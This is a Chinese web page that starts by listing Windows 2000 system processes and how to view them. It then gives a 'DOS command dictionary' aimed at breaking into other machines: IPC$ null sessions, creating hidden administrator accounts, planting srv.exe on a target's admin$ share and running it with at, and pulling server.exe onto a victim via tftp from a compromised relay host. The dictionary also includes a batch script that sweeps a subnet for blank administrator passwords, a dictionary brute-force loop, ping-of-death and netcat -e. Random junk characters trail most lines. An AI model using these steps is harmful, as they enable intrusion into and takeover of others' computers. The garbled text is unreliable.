DOS如果下查看进程

作者&投稿:邗琴 (若有异议请与网页底部的电邮联系)
dos 如何查看启动的进程~

最基本的系统进程
smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务)产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标
.
.
附加的系统进程(这些进程不是必要的,你可以根据需要通过服务管理器来增加或减少):
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表操作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000 Professional 桌面会话以及运行在服务器上的基于Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)
.
.
以下服务很少会用到,上面的服务都对安全有害,如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)
支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序(系统服务).
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)
详细说明:
win2k运行进程
Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建 需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。
Svchost.exe 组是用下面的注册表值来识别。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
每个在这个键下的值代表一个独立的Svchost组,并且当你正在看活动的进程时,它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名,这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service
更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始-运行-敲入cmd
然后在敲入 tlist -s (tlist 应该是win2k工具箱里的冬冬)
Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息,可以敲 tlist pid。
smss.exe
csrss.exe
这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows,创建或者删除线程和一些16位的虚拟MS-DOS环境
explorer.exe
这是一个用户的shell,在我们看起来就像任务条,桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中,你可以从任务管理器中停掉它,或者重新启动。
通常不会对系统产生什么负面影响。
internat.exe
这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区,允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候,图标就会消失,但是输入点仍然可以通过控制面板来改变。
lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入
令牌,令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。
mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务,负责用户事先决定在某一时间运行的任务的运行。
smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,
包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些
进程后,它等待Winlogon或者Csrss结束。如果这些过程时正常的,系统就关掉了。如果发生了什么
不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。
spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲(spooler)服务是管理缓冲池中的打印和传真作业。
service.exe
这个进程是不可以从任务管理器中关掉的。大多数的系统核心模式进程是作为系统进程在运行。
System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上,并在系统不处理其他线程的时候分派处理器的时间。
winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了,显示安全对话框。
winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化
taskmagr.exe
是任务管理器了
除此之外的都是程序的进程,名称的对应都比较可以明白,可以选择关闭,事实上如果某些程序卡住了或者删除文件时显示正在使用等都可以用进程管理器把他们关掉......

tasklist /svc /FI "imagename eq svchost.exe"

类似进程可以看到

DOS命令字典

net use \\ip\ipc$ " " /user:" " 建立IPC空链接 |6vJjWqHSM
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 [sv[iU'>
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: Iu)Qfuy+
net use h: \\ip\c$ 登陆后映射对方C:到本地为H: d.vbZSN&m
net use \\ip\ipc$ /del 删除IPC链接 l5nv6g
net use h: /del 删除映射对方到本地的为H:的映射 @z/8~g4XB
net user 用户名 密码 /add 建立用户 ;Q`+AG
net user guest /active:yes 激活guest用户 Q+lnBn
net user 查看有哪些用户 $E=M[3
net user 帐户名 查看帐户的属性 QKw;=4R`
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 iYAOF;d
net start 查看开启了哪些服务 J[b,<lKY
net start 服务名 开启服务;(如:net start telnet, net start schedule) asr5/
net stop 服务名 停止某服务 |a [Yn%"y
net time \\目标ip 查看对方时间 1$i! s
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ,afF/<[
net view 查看本地局域网内开启了哪些共享 vvC)f
net view \\ip 查看对方局域网内开启了哪些共享 .+RJ]\j"
net config 显示系统网络设置 &57hM\^ D
net logoff 断开连接的共享 stLE}5 p
net pause 服务名 暂停某服务 #&ncaZ{
net send ip "文本信息" 向对方发信息 xN]T:%j
net ver 局域网内正在使用的网络连接类型和信息 k4vo$  
net share 查看本地开启的共享 !G$z$iA{[
net share ipc$ 开启ipc$共享 IQ%M+6
net share ipc$ /del 删除ipc$共享 S[Z5I6I|
net share c$ /del 删除C:共享 JqZ3((94
net user guest 12345 用guest用户登陆后用将密码改为12345 I7y auIIz
net password 密码 更改系统登陆密码 ySn0?tG
netstat -a 查看开启了哪些端口,常用netstat -an $/s.W
netstat -n 查看端口的网络连接情况,常用netstat -an <V8%*le
netstat -v 查看正在进行的工作 _y}i+F
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) HSrwQ}9dj
netstat -s 查看正在使用的所有协议使用情况 0;F
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 ^Mv^*gmr"
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 !ERxa}2 o
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 N8":57B-,
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) MDnW A08`
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 IzuA G
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) Zili:d
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) l )zX_ia
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 Fu/<ndY:
#32cdq{.2m
#2 二: uccR@pQR
r#-`t*
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) F:W." hF&
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 |VYR4J
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 K"dBkaM,w
at id号 开启已注册的某个计划任务 3 {6cb:
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 "wcRl{
at id号 /delete 停止某个已注册的计划任务 4w2 1d^*;
at 查看所有的计划任务 Fp ":IoIP
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 %B0Lc`0wU
finger username @host 查看最近有哪些用户登陆 `<S\zfXk
telnet ip 端口 远和登陆服务器,默认端口为23 oS!C\8h
open ip 连接到IP(属telnet登陆后的命令) W$2+d K,
telnet 在本机上直接键入telnet 将进入本机的telnet AV[*jv_{tI
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 N-WsBgZlzC
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下 *4.ZN;cmz
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 5F6-QE+-<
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: G{?`^]%
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 6]q&?'@>
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 |#V-cG5V!
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 P.R@b )
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) `A Lj}t
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface Xn ' /
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 <uk% l*)
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 bfwha V1
mem 查看cpu使用情况 Hj <S1jHx{
attrib 文件名(目录名) 查看某文件(目录)的属性 gpVv c
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 ;I=77Z
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 .e-2W8_J
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 7ubBMx=Q
set 指定环境变量名称=要指派给变量的字符 设置环境变量 HZP, ;<
set 显示当前所有的环境变量 C^;|tY
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 %B`]T,
pause 暂停批处理程序,并显示出:请按任意键继续.... NM,}Ns1'6
if 在批处理程序中执行条件处理(更多说明见if命令及变量) uq[z B
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) P.6,Oo\
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) w`KrU)V
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) ep$vA}2
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 F.ZejR
echo 信息 在屏幕上显示出信息 S(h| -PP
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 ,8 >(<}p[
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello Bl%4.O :
find 文件名 查找某文件 F2 w SJ5vU
title 标题名字 更改CMD窗口标题名字 g3%&.R/
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 6B5vZoI
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) <Ix(.-rC
@m@ufR
#3 三: 8_%3#$]H
9d$gJ .i
ver 在DOS窗口下显示版本信息 "V-V<8
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) y^ /X2N]
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS C10X'W
md 目录名 创建目录 Y_j3X$
replace 源文件 要替换文件的目录 替换文件 U;:k!h=
ren 原文件名 新文件名 重命名文件名 }Nr<vi|
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 | s3V-G
type 文件名 显示文本文件的内容 k(+ 9AHt*y
more 文件名 逐屏显示输出文件 4NWJtf3
doskey 要锁定的命令=字符 H q4?v
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= wSiM##`w2
taskmgr 调出任务管理器 C`uC{ /
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 !KWJ)(
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 1oO?@c-Q
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe B\ ]"#
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 3p,;s@_
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? EW f)cL
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; ! >_xXG?
regedit /e 注册表文件名 导出注册表 Sy nkiKdH
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 _~nreS]u
cacls 文件名 查看文件的访问用户权限列表 ,hHqhS>&
REM 文本内容 在批处理文件中添加注解 rwQ#qXJ{U
netsh 查看或更改本地网络配置情况 2U nGps
WB4D6HSa*
#4 四: PD<J_fXOj
) b;>%l3
IIS服务命令: p8O9]g14y
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) N)Lek.v
iisreset /start或stop 启动(停止)所有Internet服务 lBTm/4 `
iisreset /restart 停止然后重新启动所有Internet服务 K8N b#}
iisreset /status 显示所有Internet服务状态 <xXk+JX!!
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 +SS *k$9
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 (3e(a s,/
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 ?D95
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 _X4P\Z$jF
FTP 命令: (后面有详细说明内容) m %\}#nH 
ftp的命令行格式为: P*x:|+]
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 Qh$h ,B
-d 使用调试方式。 uY+|ur
-n 限制ftp的自动登录,即不使用.netrc文件。 ! Zj>{
-g 取消全局文件名。 n9i+K+!ed+
help [命令] 或 ?[命令] 查看命令说明 lI{S8
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. D2$kFw<~>1
pwd 列出当前远端主机目录 Mv%csS]6m
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 wNAsvt |s
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 v J,_a
mget [remote-files] 从远端主机接收一批文件至本地主机 w+}[
mput local-files 将本地主机中一批文件传送至远端主机 i l
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 KZfi<`X
ascii 设定以ASCII方式传送文件(缺省值) 7g0*Sj%
bin 或 image 设定以二进制方式传送文件 $ayQ ]PtI
bell 每完成一次文件传送,报警提示 pMtBcA+V3
cdup 返回上一级目录 sK423g45
close 中断与远程服务器的ftp会话(与open对应) 1.-c0
open host[port] 建立指定ftp服务器连接,可指定连接端口 29\x_C~Tq
delete 删除远端主机中的文件 =1}nQnI+
mdelete [remote-files] 删除一批文件 w{ p V
mkdir directory-name 在远端主机中建立目录 &eka/+BaN
rename [from] [to] 改变远端主机中的文件名 [6CNH! { 
rmdir directory-name 删除远端主机中的目录 X+vHi;W
status 显示当前FTP的状态 {S4$C8w
system 显示远端主机系统类型 '& jE; $
user user-name [password] [account] 重新以别的用户名登录远端主机 WOVg Mh#'
open host [port] 重新建立一个新的连接 @B/OF-S%
prompt 交互提示模式 1-E obQ
macdef 定义宏命令 =5l7XSh 
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 r/3[fx
chmod 改变远端主机的文件权限 |Jv9M.Up
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 McOw~_]
cd remote-dir 进入远程主机目录 :^"{mpw@
cdup 进入远程主机目录的父目录 e%1YF'3
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip X+L;Wq^Z
nI<Ec qq
#5 五: 6UrKN
_'HxdS[Zga
MYSQL 命令: ePcM/cr"{V
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 9|q2n{R}W
(例:mysql -h110.110.110.110 -Uroot -P123456 ci6X+ zw
注:u与root可以不用加空格,其它也一样) &rH_}tX
exit 退出MYSQL mOcSiZj+L
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 fT+/-]?Zgz
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) QTe/U
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 'Fr|Thf
use mysql; r% M~y
show tables; 显示库中的数据表 oT]NdEn\3e
describe 表名; 显示数据表的结构 TL2ERu[%
create database 库名; 建库 5NR6?F2C
use 库名; u;<kuLj
create table 表名 (字段设定列表); 建表 !JCd)i
drop database 库名; `-TH.N'c
drop table 表名; 删库和删表 lmx|rHIU
delete from 表名; 将表中记录清空 3#|5{
select * from 表名; 显示表中的记录 s['b87 @
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 Zh/yfjOjc
win2003系统下新增命令(实用部份): U6iI(
shutdown /参数 关闭或重启本地或远程主机。 NxV9x ]
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。 CDQe"N ?
例:shutdown /r /t 0 立即重启本地主机(无延时) |M~;}_K
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 d63:y0^K
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 Gn{bUHG8
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 ^iQd(
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 x %2Y x.'
]$Rh ~`D]
#6 六: cT8eKiUG
[.4K)R
Linux系统下基本命令: 要区分大小写 S+y%Rz@=
uname 显示版本信息(同win2K的 ver) M!> ?#;[c
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) e*rUA^][>
pwd 查询当前所在的目录位置 ? w vJDQ
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 bnZz| Gf
cat 文件名 查看文件内容 jPKE~2Bhf
cat >abc.txt 往abc.txt文件中写上内容。 ~&5\2H!?D4
more 文件名 以一页一页的方式显示一个文本文件。 ZK3`1&
cp 复制文件 SosIl5/a >
mv 移动文件 nT/r3rB2
rm 文件名 删除文件,rm -a 目录名删除目录及子目录 ')wK]W=
mkdir 目录名 建立目录 <l9^&?`<
rmdir 删除子目录,目录内没有文档。 [ moTo"G
chmod 设定档案或目录的存取权限 /EAm9@1
grep 在档案中查找字符串 m0De&:HNx
diff 档案文件比较 ~JY<*o3
find 档案搜寻 /+ Omb|7n
date 现在的日期、时间 ! @8 A e%3
who 查询目前和你使用同一台机器的人以及Login时间地点 Z!7)eE]
w 查询目前上机者的详细资料 e"{QHN
whoami 查看自己的帐号名称 :}wr,$7
groups 查看某人的Group ,A{R!u$
passwd 更改密码 jQ.7oB
history 查看自己下过的命令 c&yEh:wWG
ps 显示进程状态 kXhZjpI2j
kill 停止某进程 L1UrbmL@S.
gcc 黑客通常用它来编译C语言写的文件 oR+!#DW
su 权限转换为指定使用者 Erm8DDM8b;
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ?&4%r^UHX
ftp ftp连接上某服务器(同win2K) w c!dn|H
kM3= =f4v
附:批处理命令与变量 ]2A:pR
b*A,3
1:for命令及变量 基本格式: !>W"%DBY2
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。 hV:r~zj
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3 /;*HTvuA
a#SH
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 } Nk'Zhykk[I
>I,1JyQ
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 "JhP '
command_parameters:为特定命令指定参数或命令行开关 y W'&; 
M3]Bp
IN (set):指在(set)中取值;DO command :指执行command 0!q(Mk 
~r0d2DhX
参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。 Zx}s-IYU8
用法举例: HPJ  &Vk
@echo off 4`O+5!>{^
echo 用法格式:test.bat *.*.* > test.txt F4:bYdHRr
l+ cM# \w
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt JA3/j'
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。 n,[)%e'0Z
4V~t b
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 o [6\ n4
@echo off p =7! 5y{
echo 用法格式:ok.bat ip PS6 ((m(
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 l]vnfkUVP
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。 ZGS*?$nl
TVBrlA
#7 七: :q HWB>
>Fk[<Z/3
2:if命令及变量 基本格式: 9K-?vYv
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。 k.4S~!R`_
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。 t"Xu|i E 2
0 指发现并成功执行(真);1 指没有发现、没执行(假)。 jCE:lph\
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。 vQ~B4Zg
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ") YM$`iIH=K[
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。 c@uz_ P+=
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 )U bBl3
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.” 5Uj85
a&^!|p
(二)系统外部命令(均需下载相关工具): 'tR 8n
(#:Gz
1、瑞士军刀:nc.exe $zfy5{ M
=p|t5/ptR
参数说明: $_7RK)bTU8
-h 查看帮助信息 s $/9GYz-
-d 后台模式 K sH~jD0
-e prog程序重定向,一但连接就执行〔危险〕 tBC:ZBJ:f
-i secs延时的间隔 n\ceTVTI
-l 监听模式,用于入站连接 b/X5/M
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C 9qJHa5.
-n IP地址,不能用域名 +GG\J3 * *
-o film记录16进制的传输 m>(5w=:OE@
-p[空格]端口 本地端口号 ]%T_E[
-r 随机本地及远程端口 gf<`A8!_
-t 使用Telnet交互方式 jp[$x@'a
-u UDP模式 /zUh{D8XJ
-v 详细输出,用-vv将更详细 Du)@@
-w数字 timeout延时间隔 z5txHf4f
-z 将输入,输出关掉(用于扫锚时) |?pg$
基本用法: >3'rW*<
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 @,U}g1`
nc -l -p 80 开启本机的TCP 80端口并监听 ONxzz9ure@
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 u<#^7L)
